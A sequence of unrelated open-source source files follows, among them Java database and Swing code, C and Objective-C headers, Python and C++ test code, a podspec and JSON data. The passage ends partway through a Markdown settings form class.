import de.metas.migration.impl.SQLDatabase;
import lombok.AllArgsConstructor;
import lombok.NonNull;
/*
* #%L
* de.metas.migration.cli
* %%
* Copyright (C) 2017 metas GmbH
* %%
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as
* published by the Free Software Foundation, either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program. If not, see
* <http://www.gnu.org/licenses/gpl-2.0.html>.
* #L%
*/
/**
* This class creates {@link IDatabase} instances.
*
* @author metas-dev <<EMAIL>>
*
*/
@AllArgsConstructor
class DBConnectionMaker
{
	/**
	 * Creates a regular {@link IDatabase} for the given connection settings and DB name.
	 *
	 * @param settings connection settings (type, host, port, credentials)
	 * @param dbName   name of the database to connect to
	 */
	public IDatabase createDb(
			@NonNull final DBConnectionSettings settings,
			@NonNull final String dbName)
	{
		// Return directly; the intermediate local variable added nothing.
		return new SQLDatabase(
				settings.getDbType(),
				settings.getDbHostname(),
				settings.getDbPort(),
				dbName,
				settings.getDbUser(),
				settings.getDbPassword());
	}

	/**
	 * Creates an {@link IDatabase} instance we don't intend to run migration scripts against.
	 * However, connecting to that DB is possible.
	 * <p>
	 * The returned database's {@link IScriptsRegistry} treats every script as not-applied
	 * and ignores all bookkeeping calls.
	 */
	public IDatabase createDummyDatabase(
			@NonNull final DBConnectionSettings settings,
			@NonNull final String dbName)
	{
		// return a database that does not check whether our script was applied or not
		return new SQLDatabase(
				settings.getDbType(),
				settings.getDbHostname(),
				settings.getDbPort(),
				dbName,
				settings.getDbUser(),
				settings.getDbPassword())
		{
			// @formatter:off
			@Override
			public IScriptsRegistry getScriptsRegistry()
			{
				return new IScriptsRegistry()
				{
					@Override public void markIgnored(final IScript script) { /* no-op */ }
					@Override public void markApplied(final IScript script) { /* no-op */ }
					@Override public boolean isApplied(final IScript script) { return false; }
				};
			}
			// @formatter:on
		};
	}
}
| 818 |
12,718 | <filename>lib/libc/include/wasm-wasi-musl/wasi/libc.h
#ifndef __wasi_libc_h
#define __wasi_libc_h

#include <__typedef_off_t.h>
#include <__struct_timespec.h>

#ifdef __cplusplus
extern "C" {
#endif

/* Forward declarations only; the full definitions are not needed here. */
struct stat;
struct timespec;

/// Register the given pre-opened file descriptor under the given path.
///
/// This function does not take ownership of `prefix` (it makes its own copy).
int __wasilibc_register_preopened_fd(int fd, const char *prefix);

/// Renumber `fd` to `newfd`; similar to `dup2` but does a move rather than a
/// copy.
int __wasilibc_fd_renumber(int fd, int newfd)
    __attribute__((__warn_unused_result__));

/// Like `unlinkat`, but without depending on `__wasi_path_remove_directory`.
int __wasilibc_unlinkat(int fd, const char *path)
    __attribute__((__warn_unused_result__));

/// An `*at` version of rmdir.
int __wasilibc_rmdirat(int fd, const char *path)
    __attribute__((__warn_unused_result__));

/// Like `open`, but without the varargs in the signature.
int __wasilibc_open_nomode(const char *path, int oflag);

/// Like `openat`, but without the varargs in the signature.
int __wasilibc_openat_nomode(int fd, const char *path, int oflag);

/// Return the current file offset. Like `lseek(fd, 0, SEEK_CUR)`, but without
/// depending on `lseek`.
off_t __wasilibc_tell(int fd)
    __attribute__((__warn_unused_result__));

/* Non-`at` forms of various `*at` functions; the trailing `flags` argument
 * carries the `AT_*` flags the `*at` form would take. */
int __wasilibc_access(const char *pathname, int mode, int flags)
    __attribute__((__warn_unused_result__));
int __wasilibc_stat(const char *__restrict pathname, struct stat *__restrict statbuf, int flags)
    __attribute__((__warn_unused_result__));
int __wasilibc_utimens(const char *pathname, const struct timespec times[2], int flags)
    __attribute__((__warn_unused_result__));
int __wasilibc_link(const char *oldpath, const char *newpath, int flags)
    __attribute__((__warn_unused_result__));
/* Variants of link/rename where only one side is relative to a dirfd. */
int __wasilibc_link_oldat(int olddirfd, const char *oldpath, const char *newpath, int flags)
    __attribute__((__warn_unused_result__));
int __wasilibc_link_newat(const char *oldpath, int newdirfd, const char *newpath, int flags)
    __attribute__((__warn_unused_result__));
int __wasilibc_rename_oldat(int olddirfd, const char *oldpath, const char *newpath)
    __attribute__((__warn_unused_result__));
int __wasilibc_rename_newat(const char *oldpath, int newdirfd, const char *newpath)
    __attribute__((__warn_unused_result__));

#ifdef __cplusplus
}
#endif

#endif
| 895 |
355 | /*
The MIT License (MIT)
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
package com.github.lindenb.jvarkit.variant.swing;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.Vector;
import java.util.function.Function;
import java.util.stream.Collectors;
import com.github.lindenb.jvarkit.pedigree.Pedigree;
import com.github.lindenb.jvarkit.pedigree.Sample;
import com.github.lindenb.jvarkit.pedigree.Status;
import com.github.lindenb.jvarkit.util.swing.AbstractGenericTable;
import htsjdk.variant.variantcontext.Genotype;
import htsjdk.variant.variantcontext.VariantContext;
import htsjdk.variant.vcf.VCFConstants;
@SuppressWarnings("serial")
public class SwingVCFGenotypesTableModel extends AbstractGenericTable<Genotype>{
	/** Column descriptors; rebuilt from scratch on every call to {@link #setRows(List)}. */
	private final Vector<ColumnInfo> columns = new Vector<>();
	/** Optional pedigree used to render the affected/unaffected status column; may be null. */
	private final Pedigree pedigree;

	/** Describes one table column: display name, cell class and the value extractor. */
	private class ColumnInfo {
		String name;
		Class<?> clazz;
		Function<Genotype, Object> extractor;
	}

	public SwingVCFGenotypesTableModel(final Pedigree pedigree) {
		super();
		this.pedigree=pedigree;
	}

	/** Shows the genotypes of {@code ctx}; clears the table when ctx is null or has no genotypes. */
	public void setVariant(final VariantContext ctx) {
		final List<Genotype> genotypes;
		if(ctx==null || !ctx.hasGenotypes()) {
			genotypes = Collections.emptyList();
		}
		else {
			genotypes = ctx.getGenotypes();
		}
		setRows(genotypes);
	}

	@Override
	synchronized public void setRows(final List<Genotype> genotypes) {
		if(genotypes==null) {
			setRows(Collections.emptyList());
			// BUGFIX: without this return the method continued with the null
			// list and threw a NullPointerException at genotypes.stream() below.
			return;
		}
		this.columns.clear();
		// Build the new column set in a local list first (renamed from 'columns'
		// so it no longer shadows the field) and install it in one step.
		final Vector<ColumnInfo> newColumns = new Vector<>();
		ColumnInfo ci = new ColumnInfo();
		ci.clazz = String.class;
		ci.name= "Sample";
		ci.extractor = GT->GT.getSampleName();
		newColumns.add(ci);
		if(this.pedigree!=null) {
			ci = new ColumnInfo();
			ci.clazz = String.class;
			ci.name= "Status";
			// "[*]" = affected, "[ ]" = unaffected, null = unknown / not in pedigree.
			ci.extractor = GT->{
				final Sample sn= this.pedigree.getSampleById(GT.getSampleName());
				if( sn==null || !sn.isStatusSet()) return null;
				if(sn.getStatus().equals(Status.affected)) return "[*]";
				if(sn.getStatus().equals(Status.unaffected)) return "[ ]";
				return null;
				};
			newColumns.add(ci);
			}
		// The remaining columns are only added when at least one genotype carries the field.
		if(genotypes.stream().anyMatch(G->G.isAvailable())) {
			ci = new ColumnInfo();
			ci.clazz = String.class;
			ci.name= VCFConstants.GENOTYPE_KEY;
			ci.extractor = GT->GT.getAlleles().stream().
					map(A->A.getDisplayString()).
					collect(Collectors.joining(GT.isPhased()?Genotype.PHASED_ALLELE_SEPARATOR:Genotype.UNPHASED_ALLELE_SEPARATOR));
			newColumns.add(ci);
			}
		ci = new ColumnInfo();
		ci.clazz = String.class;
		ci.name= "Type";
		ci.extractor = GT->GT.getType().name();
		newColumns.add(ci);
		if(genotypes.stream().anyMatch(G->G.hasDP())) {
			ci = new ColumnInfo();
			ci.clazz = String.class;
			ci.name= VCFConstants.DEPTH_KEY;
			ci.extractor = GT->GT.hasDP()?GT.getDP():null;
			newColumns.add(ci);
			}
		if(genotypes.stream().anyMatch(G->G.hasGQ())) {
			ci = new ColumnInfo();
			ci.clazz = String.class;
			ci.name= VCFConstants.GENOTYPE_QUALITY_KEY;
			ci.extractor = GT->GT.hasGQ()?GT.getGQ():null;
			newColumns.add(ci);
			}
		if(genotypes.stream().anyMatch(G->G.hasAD())) {
			ci = new ColumnInfo();
			ci.clazz = String.class;
			ci.name= VCFConstants.GENOTYPE_ALLELE_DEPTHS;
			ci.extractor = GT->GT.hasAD()?Arrays.stream(GT.getAD()).mapToObj(P->String.valueOf(P)).collect(Collectors.joining(",")):null;
			newColumns.add(ci);
			}
		if(genotypes.stream().anyMatch(G->G.hasPL())) {
			ci = new ColumnInfo();
			ci.clazz = String.class;
			ci.name= VCFConstants.GENOTYPE_PL_KEY;
			ci.extractor = GT->GT.hasPL()?Arrays.stream(GT.getPL()).mapToObj(P->String.valueOf(P)).collect(Collectors.joining(",")):null;
			newColumns.add(ci);
			}
		// One extra column per FORMAT attribute seen in any genotype.
		for(final String att: genotypes.stream().
				flatMap(G->G.getExtendedAttributes().keySet().stream()).
				collect(Collectors.toSet())) {
			ci = new ColumnInfo();
			ci.clazz = Object.class;
			ci.name= att;
			ci.extractor = GT->GT.hasExtendedAttribute(att)?GT.getExtendedAttribute(att):null;
			newColumns.add(ci);
			}
		this.columns.addAll(newColumns);
		super.rows.clear();
		super.rows.addAll(genotypes);
		// Column set changed, not just the rows.
		fireTableStructureChanged();
		}

	@Override
	public int getColumnCount() {
		return this.columns.size();
		}

	@Override
	public Class<?> getColumnClass(int column) {
		return this.columns.get(column).clazz;
		}

	@Override
	public String getColumnName(int column) {
		return this.columns.get(column).name;
		}

	@Override
	public Object getValueOf(final Genotype F, int column) {
		return this.columns.get(column).extractor.apply(F);
		}
	}
| 2,396 |
594 | import json
import os
import glob
import dataconverter
# TODO adapt this method to get real detections on the given image.
# You have to stick to the given result format.
def mock_detector(image):
    """Return two hard-coded dummy detections for ``image``.

    The image itself is ignored; this stands in for a real detector and
    illustrates the expected result format (one dict per detection with
    box corners, score, identity and orientation).
    """
    pedestrian = {
        'x0': 0.0,
        'x1': 10.0,
        'y0': 0.0,
        'y1': 100.0,
        'score': 0.8,
        'identity': 'pedestrian',
        'orient': 0.0,
    }
    rider = {
        'x0': 10.0,
        'x1': 20.0,
        'y0': 0.0,
        'y1': 1000.0,
        'score': 0.7,
        'identity': 'rider',
        'orient': 1.0,
    }
    return [pedestrian, rider]
def run_detector_on_dataset(time='day', mode='val'):
    """Run the (mock) detector on every image of the chosen split and dump
    one JSON file per image into ./data/mock_detections/<time>/<mode>/.

    :param time: dataset condition, 'day' or 'night'
    :param mode: dataset split, 'val' or 'test'
    """
    assert mode in ['val', 'test']
    assert time in ['day', 'night']
    eval_imgs = glob.glob('./data/{}/img/{}/*/*'.format(time, mode))
    destdir = './data/mock_detections/{}/{}/'.format(time, mode)
    # presumably creates destdir (recursively) if missing -- TODO confirm
    dataconverter.create_base_dir(destdir)
    for im in eval_imgs:
        detections = mock_detector(im)
        destfile = os.path.join(destdir, os.path.basename(im).replace('.png', '.json'))
        frame = {'identity': 'frame'}
        frame['children'] = detections
        # BUGFIX: the original passed open(destfile, 'w') directly to json.dump,
        # leaking the file handle; use a context manager so it is always closed.
        with open(destfile, 'w') as f:
            json.dump(frame, f, indent=1)


if __name__ == "__main__":
    run_detector_on_dataset(time='day', mode='val')
| 792 |
844 | <reponame>iprinceroyy/Hacktoberfest-2020
{
"github-username": "Fonta22",
"favourite-emoji": "🦠",
"favourite-music": "https://soundcloud.com/monstercat/noisestorm-crab-rave",
"favourite-color": "#FBFFBF"
}
| 94 |
326 | <filename>extensions/test/nsphere/nsphere-index_margin.cpp
// Boost.Geometry (aka GGL, Generic Geometry Library)
// Unit Test
// Copyright (c) 2007-2012 <NAME>, Amsterdam, the Netherlands.
// Copyright (c) 2013 <NAME>, Lodz, Poland.
// Use, modification and distribution is subject to the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
#include <geometry_test_common.hpp>
#include <boost/geometry/geometries/geometries.hpp>
#include <boost/geometry/strategies/strategies.hpp>
#include <boost/geometry/extensions/nsphere/nsphere.hpp>
// Checks the comparable margin of a 2D n-sphere (circle) centered at the
// origin: with radius 2 the expected comparable margin is 2 (== r).
template <typename P, typename T>
void test_comparable_margin_circle()
{
    bg::model::nsphere<P, T> c;
    bg::set<0>(c.center(), 0);
    bg::set<1>(c.center(), 0);
    c.radius(2);

    double d = bg::index::detail::comparable_margin(c);
    BOOST_CHECK_CLOSE(d, 2, 0.001);
}
// Checks the comparable margin of a 3D n-sphere: with radius 2 the expected
// comparable margin is 4 (== 2*r). Note this test sets center/radius via the
// generic set/set_radius accessors rather than the member functions above.
template <typename P, typename T>
void test_comparable_margin_sphere()
{
    bg::model::nsphere<P, T> s;
    bg::set<0>(s, 0);
    bg::set<1>(s, 0);
    bg::set<2>(s, 0);
    bg::set_radius<0>(s, 2);

    double d = bg::index::detail::comparable_margin(s);
    BOOST_CHECK_CLOSE(d, 4, 0.001);
}
// Boost.Test entry point: run both checks with double-precision cartesian points.
int test_main(int, char* [])
{
    test_comparable_margin_circle<bg::model::point<double, 2, bg::cs::cartesian>, double>();
    test_comparable_margin_sphere<bg::model::point<double, 3, bg::cs::cartesian>, double>();
    return 0;
}
| 589 |
7,744 | //
// ASContextTransitioning.h
// Texture
//
// Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
// Changes after 4/13/2017 are: Copyright (c) Pinterest, Inc. All rights reserved.
// Licensed under Apache 2.0: http://www.apache.org/licenses/LICENSE-2.0
//
#import <AsyncDisplayKit/ASDimension.h>
@class ASDisplayNode;
@class ASLayout;
NS_ASSUME_NONNULL_BEGIN
// Keys identifying the "from" and "to" layouts; valid arguments for
// -layoutForKey:, -constrainedSizeForKey: and -subnodesForKey: below.
ASDK_EXTERN NSString * const ASTransitionContextFromLayoutKey;
ASDK_EXTERN NSString * const ASTransitionContextToLayoutKey;

@protocol ASContextTransitioning <NSObject>

/**
 @abstract Defines if the given transition is animated
 */
- (BOOL)isAnimated;

/**
 * @abstract Retrieve either the "from" or "to" layout
 * @discussion Pass ASTransitionContextFromLayoutKey or ASTransitionContextToLayoutKey.
 */
- (nullable ASLayout *)layoutForKey:(NSString *)key;

/**
 * @abstract Retrieve either the "from" or "to" constrainedSize
 */
- (ASSizeRange)constrainedSizeForKey:(NSString *)key;

/**
 * @abstract Retrieve the subnodes from either the "from" or "to" layout
 */
- (NSArray<ASDisplayNode *> *)subnodesForKey:(NSString *)key;

/**
 * @abstract Subnodes that have been inserted in the layout transition
 */
- (NSArray<ASDisplayNode *> *)insertedSubnodes;

/**
 * @abstract Subnodes that will be removed in the layout transition
 */
- (NSArray<ASDisplayNode *> *)removedSubnodes;

/**
 @abstract The frame for the given node before the transition began.
 @discussion Returns CGRectNull if the node was not in the hierarchy before the transition.
 */
- (CGRect)initialFrameForNode:(ASDisplayNode *)node;

/**
 @abstract The frame for the given node when the transition completes.
 @discussion Returns CGRectNull if the node is no longer in the hierarchy after the transition.
 */
- (CGRect)finalFrameForNode:(ASDisplayNode *)node;

/**
 @abstract Invoke this method when the transition is completed in `animateLayoutTransition:`
 @discussion Passing NO to `didComplete` will set the original layout as the new layout.
 */
- (void)completeTransition:(BOOL)didComplete;

@end
NS_ASSUME_NONNULL_END
| 619 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.web.jsf.metamodel;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.io.IOException;
import java.util.List;
import org.netbeans.modules.j2ee.metadata.model.api.MetadataModel;
import org.netbeans.modules.j2ee.metadata.model.api.MetadataModelAction;
import org.netbeans.modules.j2ee.metadata.model.support.TestUtilities;
import org.netbeans.modules.web.jsf.api.facesmodel.Application;
import org.netbeans.modules.web.jsf.api.metamodel.FacesManagedBean;
import org.netbeans.modules.web.jsf.api.metamodel.JsfModel;
import org.netbeans.modules.xml.xam.AbstractModelFactory;
import org.openide.filesystems.FileObject;
/**
 * Tests that the merged JSF metamodel tracks multiple faces-config XML files
 * in a source root: several configs present at once, removal and addition of
 * configs while the model is open, filtering of non-JSF configuration files
 * (PrettyFaces), and re-reading of managed-bean declarations after edits.
 *
 * @author ads
 *
 */
public class SeveralXmlModelTest extends CommonTestCase {

    public SeveralXmlModelTest( String testName ) {
        super(testName);
    }

    /** Three config files up front must yield three models, two of which declare an application. */
    public void testSeveralModelInSrc() throws IOException, InterruptedException{
        TestUtilities.copyStringToFileObject(srcFO, "WEB-INF/faces-config.xml",
                getFileContent("data/faces-config.xml"));
        TestUtilities.copyStringToFileObject(srcFO, "META-INF/one.faces-config.xml",
                getFileContent("data/one.faces-config.xml"));
        TestUtilities.copyStringToFileObject(srcFO, "META-INF/two.faces-config.xml",
                getFileContent("data/two.faces-config.xml"));
        createJsfModel().runReadAction(new MetadataModelAction<JsfModel,Void>(){

            public Void run( JsfModel model ) throws Exception {
                assertEquals( 3 , model.getModels().size());
                assertNotNull( model.getMainConfig() );
                assertEquals( 3 , model.getFacesConfigs().size());
                List<Application> applications = model.getElements( Application.class);
                assertEquals( 2 , applications.size());
                // Exactly one of the two applications carries a system event
                // listener; find it, then verify the other one is empty.
                Application withSystemEventListener= null;
                for (Application application : applications) {
                    if ( application.getSystemEventListeners().size() == 1){
                        withSystemEventListener = application;
                    }
                }
                assertNotNull( "one application should have " +
                        "child system event listener", withSystemEventListener );
                Application empty =
                    applications.get( 0 ).equals( withSystemEventListener) ?
                            applications.get( 1 ) : applications.get(0);
                assertEquals( "one application should be empty", 0, empty.getChildren().size());
                return null;
            }
        });
    }

    /** Deleting a config file while the model is open must shrink the merged model. */
    public void testRemoveModelInSrc() throws IOException, InterruptedException{
        TestUtilities.copyStringToFileObject(srcFO, "WEB-INF/faces-config.xml",
                getFileContent("data/faces-config.xml"));
        TestUtilities.copyStringToFileObject(srcFO, "META-INF/one.faces-config.xml",
                getFileContent("data/one.faces-config.xml"));
        TestUtilities.copyStringToFileObject(srcFO, "META-INF/two.faces-config.xml",
                getFileContent("data/two.faces-config.xml"));
        createJsfModel().runReadAction(new MetadataModelAction<JsfModel,Void>(){

            public Void run( JsfModel model ) throws Exception {
                // File-change events arrive asynchronously; wait for the
                // model's property change before asserting (see PropListener).
                PropListener l = new PropListener();
                model.addPropertyChangeListener(l);
                srcFO.getFileObject("META-INF/two.faces-config.xml").delete();
                l.waitForModelUpdate();
                assertEquals( 2 , model.getModels().size());
                assertEquals( 2 , model.getFacesConfigs().size());
                List<Application> applications = model.getElements( Application.class);
                assertEquals( 1 , applications.size());
                return null;
            }
        });
    }

    /** Creating a new config file while the model is open must grow the merged model. */
    public void testAddModelInSrc() throws IOException, InterruptedException{
        FileObject fileObject = srcFO.getFileObject("META-INF/one.faces-config.xml");
        if ( fileObject!= null ){
            fileObject.delete();
        }
        TestUtilities.copyStringToFileObject(srcFO, "META-INF/one.faces-config.xml",
                getFileContent("data/one.faces-config.xml"));
        TestUtilities.copyStringToFileObject(srcFO, "META-INF/two.faces-config.xml",
                getFileContent("data/two.faces-config.xml"));
        createJsfModel().runReadAction(new MetadataModelAction<JsfModel,Void>(){

            public Void run( JsfModel model ) throws Exception {
                assertEquals( 2 , model.getModels().size());
                List<Application> applications = model.getElements( Application.class);
                assertEquals( 1 , applications.size());
                PropListener l = new PropListener();
                model.addPropertyChangeListener(l);
                TestUtilities.copyStringToFileObject(srcFO, "WEB-INF/faces-config.xml",
                        getFileContent("data/faces-config.xml"));
                l.waitForModelUpdate();
                assertEquals( 3 , model.getModels().size());
                assertEquals( 3 , model.getFacesConfigs().size());
                applications = model.getElements( Application.class);
                assertEquals( 2 , applications.size());
                return null;
            }
        });
    }

    /** A PrettyFaces config in META-INF must not be picked up as a JSF model. */
    public void testPrettyFacesModel() throws IOException, InterruptedException {
        TestUtilities.copyStringToFileObject(srcFO, "META-INF/faces-config-prettyFaces.xml", getFileContent("data/faces-config-prettyFaces.xml"));
        createJsfModel().runReadAction(new MetadataModelAction<JsfModel, Void>() {
            @Override
            public Void run(JsfModel model) throws Exception {
                assertEquals(0, model.getModels().size());
                PropListener l = new PropListener();
                model.addPropertyChangeListener(l);
                TestUtilities.copyStringToFileObject(srcFO, "WEB-INF/faces-config.xml", getFileContent("data/faces-config.xml"));
                l.waitForModelUpdate();
                assertEquals(1, model.getModels().size());
                assertEquals(1, model.getFacesConfigs().size());
                List<Application> applications = model.getElements(Application.class);
                assertEquals(1, applications.size());
                return null;
            }
        });
    }

    /** Managed beans without a declared class must disappear from completion after a file edit. */
    public void testModelBeanCompletion() throws Exception {
        FileObject fileObject = srcFO.getFileObject("META-INF/one.faces-config.xml");
        if (fileObject != null) {
            fileObject.delete();
        }
        TestUtilities.copyStringToFileObject(srcFO, "META-INF/faces-config.xml",
                getFileContent("data/faces-config.xml"));
        MetadataModel<JsfModel> jsfModel = createJsfModel();
        jsfModel.runReadAction(new MetadataModelAction<JsfModel, Void>() {
            public Void run(JsfModel model) throws Exception {
                List<FacesManagedBean> elements = model.getElements(FacesManagedBean.class);
                assertEquals(1 , elements.size());
                return null;
            }
        });
        // wait threshold for next possible XDM model update invokation
        Thread.sleep(AbstractModelFactory.DELAY_DIRTY);
        jsfModel.runReadAction(new MetadataModelAction<JsfModel, Void>() {
            public Void run(JsfModel model) throws Exception {
                // change content of the file and put there MDB without specified class
                PropListener l = new PropListener();
                model.getFacesConfigs().get(0).getModel().addPropertyChangeListener(l);
                TestUtilities.copyStringToFileObject(srcFO, "META-INF/faces-config.xml",
                        getFileContent("data/three.faces-config.xml"));
                l.waitForModelUpdate();
                // ManagedBeans without specified class shouldn't be returned
                List<FacesManagedBean> elements = model.getElements(FacesManagedBean.class);
                assertEquals(0 , elements.size());
                return null;
            }
        });
    }

    /**
     * File change events (which cause reload of list of configuration files) are
     * fired in separate thread and to synchronize on delivery of these events
     * we wait on a property change event.
     *
     * NOTE(review): waitForModelUpdate() polls with no timeout, so a missed
     * event hangs the test run instead of failing it — intentional here?
     */
    static class PropListener implements PropertyChangeListener {
        // Guarded by "this"; flipped once the model fires any property change.
        private boolean modelUpdated = false;

        @Override
        public synchronized void propertyChange(PropertyChangeEvent evt) {
            modelUpdated = true;
        }

        // Busy-wait (100 ms polls) until the asynchronous update arrives.
        public void waitForModelUpdate() throws InterruptedException {
            while (!isModelUpdated()) {
                Thread.sleep(100);
            }
        }

        public synchronized boolean isModelUpdated() {
            return modelUpdated;
        }
    }
}
| 4,196 |
5,169 | {
"name": "CSSSelectorConverter",
"version": "1.1.1",
"license": "MIT",
"summary": "Objective-C/Cocoa String Tokenizer and Parser toolkit. Supports Grammars.",
"homepage": "https://github.com/siuying/CSSSelectorConverter",
"authors": {
"<NAME>": "<EMAIL>"
},
"source": {
"git": "https://github.com/siuying/CSSSelectorConverter.git",
"tag": "1.1.1",
"submodules": true
},
"description": "\n A CSS Selector to XPath Selector for Objective-C. Support mostly used subset of CSS Selector Level 3.\n ",
"platforms": {
"ios": "6.0",
"osx": "10.8"
},
"dependencies": {
"CocoaLumberjack": [
"~> 1.9.0"
]
},
"requires_arc": true,
"subspecs": [
{
"name": "Core",
"source_files": "CSSSelectorConverter/CSS*.{m,h}",
"prefix_header_contents": "#import \"CSSSelectorConverter.h\"",
"requires_arc": true,
"resources": "CSSSelectorConverter/*.{txt,plist}",
"dependencies": {
"CSSSelectorConverter/CoreParse": [
]
}
},
{
"name": "CoreParse",
"source_files": "vendor/CoreParse/CoreParse/**/*.{h,m}",
"exclude_files": "vendor/CoreParse/CoreParse/CPSenTestKitAssertions.h",
"requires_arc": false
}
]
}
| 570 |
429 | <filename>src/tests/ftest/io/small_file_count.py
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
from file_count_test_base import FileCountTestBase
class SmallFileCount(FileCountTestBase):
    # pylint: disable=too-many-ancestors
    """Test class Description: Runs IOR and MDTEST to create large number of files.
    :avocado: recursive
    """

    # NOTE: the ":avocado:" tags in the docstrings below are parsed by the
    # avocado test runner and must not be reworded.
    def test_smallfilecount(self):
        """Jira ID: DAOS-3845.
        Test Description:
            Run IOR and MDTEST with 30 clients with smaller file counts.
        Use Cases:
            Run IOR for 5 mints with DFS and POSIX and create 30 x 2G files
            Run MDTEST to create 50K files with DFS and POSIX
        :avocado: tags=all,daily_regression
        :avocado: tags=hw,large
        :avocado: tags=daosio,dfuse
        :avocado: tags=smallfilecount
        """
        # Delegates to FileCountTestBase.run_file_count(), which reads the
        # IOR/MDTEST parameters (file counts, APIs, transfer sizes) from the
        # test yaml associated with this class.
        self.run_file_count()
| 385 |
921 | <filename>src/main/java/com/vladsch/md/nav/settings/MdHtmlSettingsForm.java
// Copyright (c) 2015-2020 <NAME> <<EMAIL>> Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.vladsch.md.nav.settings;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.application.ModalityState;
import com.intellij.openapi.editor.colors.EditorColorsScheme;
import com.intellij.openapi.editor.ex.EditorEx;
import com.intellij.openapi.editor.highlighter.EditorHighlighter;
import com.intellij.openapi.fileTypes.FileType;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.ui.ComboBox;
import com.intellij.ui.CollectionComboBoxModel;
import com.intellij.ui.components.JBCheckBox;
import com.intellij.uiDesigner.core.GridConstraints;
import com.intellij.uiDesigner.core.GridLayoutManager;
import com.intellij.util.containers.ContainerUtil;
import com.vladsch.md.nav.editor.resources.TextHtmlGeneratorProvider;
import com.vladsch.md.nav.editor.util.HtmlGeneratorProvider;
import com.vladsch.md.nav.editor.util.HtmlPanelProvider;
import com.vladsch.md.nav.settings.api.SettingsFormImpl;
import com.vladsch.plugin.util.ui.Settable;
import com.vladsch.plugin.util.ui.SettingsComponents;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.JComponent;
import javax.swing.JPanel;
import java.awt.Container;
import java.awt.Dimension;
import java.awt.event.ActionListener;
import java.awt.event.ItemEvent;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Objects;
/**
 * Settings form for Markdown HTML generation: lets the user pick an HTML
 * generator provider compatible with the active preview panel and edit the
 * head/body top/bottom HTML snippets injected into generated pages.
 * Each snippet editor is paired with an enable checkbox; disabled editors
 * are collapsed to reclaim vertical space (see updateFormOnReshow).
 */
public class MdHtmlSettingsForm extends SettingsFormImpl {
    private JPanel myMainPanel;
    ComboBox<HtmlGeneratorProvider.Info> myHtmlProviders;
    JBCheckBox myHeadTopEnabled;
    JBCheckBox myHeadBottomEnabled;
    JBCheckBox myBodyTopEnabled;
    JBCheckBox myBodyBottomEnabled;
    JBCheckBox myAddDocTypeHtml;
    CustomizableEditorTextField myHeadTop;
    CustomizableEditorTextField myHeadBottom;
    CustomizableEditorTextField myBodyTop;
    CustomizableEditorTextField myBodyBottom;
    JBCheckBox myAddPageHeader;
    JBCheckBox myAddAnchorLinks;
    JBCheckBox myAnchorLinksWrapText;
    JBCheckBox myImageUriSerials;
    JBCheckBox myNoParaTags;
    JBCheckBox myDefaultUrlTitle;
    // Assigned by the UI designer / createUIComponents(); read reflectively.
    @SuppressWarnings("unused") private JPanel myExtensionsPanel;
    @Nullable private ActionListener myUpdateListener;
    @NotNull CollectionComboBoxModel<HtmlGeneratorProvider.Info> myHtmlProvidersModel;
    // Tracks the combo selection so apply()/isModified() see the pending choice.
    @NotNull HtmlGeneratorProvider.Info myHtmlProviderLastItem;
    @Nullable private Map<JBCheckBox, CustomizableEditorTextField> checkBoxEditorMap;
    HtmlPanelProvider.Info myLastPanelProviderInfo;
    final boolean myAllowPlainTextHtmlGenerator;

    @NotNull
    public JComponent getComponent() {
        return myMainPanel;
    }

    private final SettingsComponents<MdHtmlSettings> components;

    public MdHtmlSettingsForm(RenderingProfileSynchronizer profileSynchronizer, boolean allowPlainTextHtmlGenerator) {
        super(profileSynchronizer);
        // Binds every UI control to its MdHtmlSettings getter/setter pair so
        // reset/apply/isModified can be driven generically.
        components = new SettingsComponents<MdHtmlSettings>() {
            @Override
            protected Settable<MdHtmlSettings>[] createComponents(@NotNull MdHtmlSettings i) {
                JComponentGetter<CustomizableEditorTextField, String> textEditorGetter = component -> getEditorTextFieldText(component);
